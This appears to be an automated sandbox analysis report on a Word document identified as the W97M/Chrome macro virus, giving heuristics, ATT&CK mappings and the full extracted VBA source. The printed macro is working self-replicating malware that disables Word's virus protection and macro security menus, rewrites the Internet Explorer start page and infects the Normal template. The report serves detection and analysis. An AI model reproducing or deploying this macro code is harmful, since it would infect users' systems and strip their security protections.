MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a Document_Open macro and an Auto_Close macro, indicative of malicious intent. The VBA script attempts to disable security warnings and modify the Internet Explorer start page to 'http://codemonkey.cjb.net'. It also attempts to modify the document's VBA project, suggesting it may be a downloader or part of a larger attack chain.
Heuristics 6
-
ClamAV: Doc.Trojan.Chameleon-13 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Chameleon-13
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://codemonkey.cjb.net In document text (OLE body)
- http://www.geocities.com/sir_dystyk/index.htmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8252 bytes |
SHA-256: 679748df5b2700f68fa2c0d08c6a3a20089981eea059b9754c286566f4ba01fc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
Randomize
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://codemonkey.cjb.net"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
Else
CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
End If
With Options
.VirusProtection = (Rnd * 0)
.SaveNormalPrompt = (Rnd * 0)
.ConfirmConversions = (Rnd * 0)
End With
With Application
.EnableCancelKey = wdCancelDisabled
.UserName = "Total Konfuzion"
.UserInitials = "TK"
.UserAddress = "W97M/Chrome"
End With
If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Set d = i.VBProject.VBComponents.Item(1).CodeModule
d.DeleteLines 1, d.CountOfLines
d.AddFromString Vx
Chrome = "The day of the Chrome is comming... >8) "
If Day(Now) <> "15" Then
StatusBar = Chrome
Application.Caption = Chrome
End If
If Day(Now) = "15" Then
Application.Caption = Chrome
With ActiveDocument.Shapes.AddShape(msoShapeSmileyFace, 220, 150, 150, 140).Fill
.ForeColor.RGB = RGB(90, 90, 100)
.BackColor.RGB = RGB(190, 211, 230)
.TwoColorGradient msoGradientHorizontal, 1
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
End Sub
Sub HelpAbout()
MsgBox "W97M/Chrome" + vbCr + vbCr + " -Total Konfuzion-", vbSystemModal, ">8)"
End Sub
Private Sub AutoClose()
If Day(Now) = Minute(Now) Then MsgBox "The day of the Chrome is comming... >8)", vbCritical + vbSystemModal, "W97M/Chrome"
End Sub
' Processing file: /opt/analyzer/scan_staging/65a8135b88fd42ae862b10a304dcf24f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10193 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitStr 0x0000 ""
' LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' LitStr 0x0003 "MVP"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x001A "Enabled by Total Konfuzion"
' Ne
' IfBlock
' Line #3:
' ArgsCall Read 0x0000
' Line #4:
' LitStr 0x0019 "http://codemonkey.cjb.net"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
' LitStr 0x000A "Start Page"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #5:
' LitStr 0x0000 ""
' LitStr 0x0038 "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #6:
' Ld Rnd
' LitDI2 0x0000
' Mul
' Paren
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #7:
' ElseBlo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.